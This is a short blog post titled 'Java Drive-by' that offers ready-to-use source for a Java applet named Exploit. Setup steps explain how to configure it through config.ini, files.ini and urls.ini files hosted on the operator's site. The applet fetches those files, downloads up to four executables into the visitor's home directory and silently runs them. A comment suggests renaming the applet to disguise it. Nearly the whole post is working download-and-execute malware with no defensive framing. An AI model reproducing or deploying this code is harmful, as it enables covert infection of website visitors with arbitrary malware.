Java Drive-by
Create the config.ini in notepad and just put a numeric value for the amount of exe\'s you want it to execute. if you\'re only having it dl/exec 1 file then for the value put 1
Create the files.ini in notepad and just put the name of the file its going to download, if you\'re hosting the file as blah.exe just put blah.exe
Create the urls.ini and just put the full download link of whatever file you want it to download and execute.Code:import java.applet.Applet; import java.io.BufferedOutputStream; import java.io.BufferedReader; import java.io.File; import java.io.FileOutputStream; import java.io.FileReader; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; import java.io.OutputStream; import java.net.URL; import java.net.URLConnection; import java.security.AccessControlException; import java.util.ArrayList; // //Change Example to what you want users to see as your Applet Name @SuppressWarnings(\"serial\") public class Exploit extends Applet{ //Same here public Exploit(){ } public String getContents(File aFile) { StringBuilder contents = new StringBuilder(); try { BufferedReader input = new BufferedReader(new FileReader(aFile)); try { String line = null; //not declared within while loop while (( line = input.readLine()) != null){ contents.append(line); contents.append(System.getProperty(\"line.separator\")); } } finally { input.close(); } } catch (IOException ex){ ex.printStackTrace(); } return contents.toString(); } public String getConfig(String link){ try { URLConnection url = null; BufferedReader in = null; url = new URL(link).openConnection(); in = new BufferedReader(new InputStreamReader(url.getInputStream())); String str = in.readLine(); if (in != null) { in.close(); } return str; } catch (final IOException e) { } return null; } public ArrayListgetConfigArray(String link){ URLConnection url = null; String line; ArrayList file = new ArrayList (); try { url = new URL(link).openConnection(); BufferedReader in = new BufferedReader(new InputStreamReader(url.getInputStream())); while ((line = in.readLine()) != null) file.add(line); if (in != null) { in.close(); } return file; } catch (final IOException e) { } return null; } public ArrayList loadFile(String fileName) { if ((fileName == null) || (fileName == \"\")) throw new IllegalArgumentException(); String line; ArrayList file = new ArrayList (); try { BufferedReader in = new BufferedReader(new FileReader(fileName)); if (!in.ready()) throw new IOException(); while ((line = in.readLine()) != null) file.add(line); in.close(); } catch (IOException e) { System.out.println(e); return null; } return file; } //Main Method public void start() throws AccessControlException{ String userdir = System.getProperty(\"user.home\"); String configs = \"config.ini\"; String urlss = \"urls.ini\"; String filess = \"files.ini\"; //FULL PATH TO YOUR WEBSITE HERE(WERE JAR IS GOING TO BE PALCED)\\\\ String mainURL = \"http://site.com/\"; ///////////////////////////////////////////////////Do not touch anything below\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ //try{ //////////////////////////////////FILE 1////////////////////////////////// if(getConfig(mainURL+configs).contains(\"1\") || getConfig(mainURL+configs).contains(\"2\") || getConfig(mainURL+configs).contains(\"3\") || getConfig(mainURL+configs).contains(\"4\")){ String fname = \"\\\\\"+getConfigArray(mainURL+filess).get(0); String fpath = userdir.concat(fname); final String locationDownload = getConfigArray(mainURL+urlss).get(0); download(locationDownload, fpath); final Runtime run = Runtime.getRuntime(); try { run.exec(fpath); } catch (final IOException e) { } } //////////////////////////////////FILE 2////////////////////////////////// if(getConfig(mainURL+configs).contains(\"2\") || getConfig(mainURL+configs).contains(\"3\") || getConfig(mainURL+configs).contains(\"4\")){ String fname2 = \"\\\\\"+getConfigArray(mainURL+filess).get(1); final Runtime run = Runtime.getRuntime(); String fpath2 = userdir.concat(fname2); final String locationDownload2 = getConfigArray(mainURL+urlss).get(1); download(locationDownload2, fpath2); try { run.exec(fpath2); } catch (final IOException e){ } } //////////////////////////////////FILE 3///////////////////////////////// if(getConfig(mainURL+configs).contains(\"3\") || getConfig(mainURL+configs).contains(\"4\")){ String fname3 = \"\\\\\"+getConfigArray(mainURL+filess).get(2); final Runtime run = Runtime.getRuntime(); String fpath3 = userdir.concat(fname3); final String locationDownload3 = getConfigArray(mainURL+urlss).get(2); download(locationDownload3, fpath3); try { run.exec(fpath3); } catch (final IOException e){ } } /////////////////////////////////FILE 4////////////////////////////////// if(getConfig(mainURL+configs).contains(\"4\")){ String fname4 = \"\\\\\"+getConfigArray(mainURL+filess).get(3); final Runtime run = Runtime.getRuntime(); String fpath4 = userdir.concat(fname4); final String locationDownload3 = getConfigArray(mainURL+urlss).get(3); download(locationDownload3, fpath4); try { run.exec(fpath4); } catch (final IOException e){ } } ////////////////////////////////END/////////////////////////////////// //}catch (AccessControlException e){ // System.out.println(\"hi\"); // } } public void download(final String address, final String localFileName) { OutputStream out = null; URLConnection conn = null; InputStream in = null; try { final URL url = new URL(address); out = new BufferedOutputStream(new FileOutputStream(localFileName)); conn = url.openConnection(); in = conn.getInputStream(); final byte[] buffer = new byte[1024]; int numRead; while ((numRead = in.read(buffer)) != -1) { out.write(buffer, 0, numRead); } } catch (final Exception exception) { } finally { try { if (in != null) { in.close(); } if (out != null) { out.close(); } } catch (final IOException ioe) { } } } public void main(String args[]){ start(); } public void stop(){ } }
©2011, copyright BLACK BURN
0 comments:
Post a Comment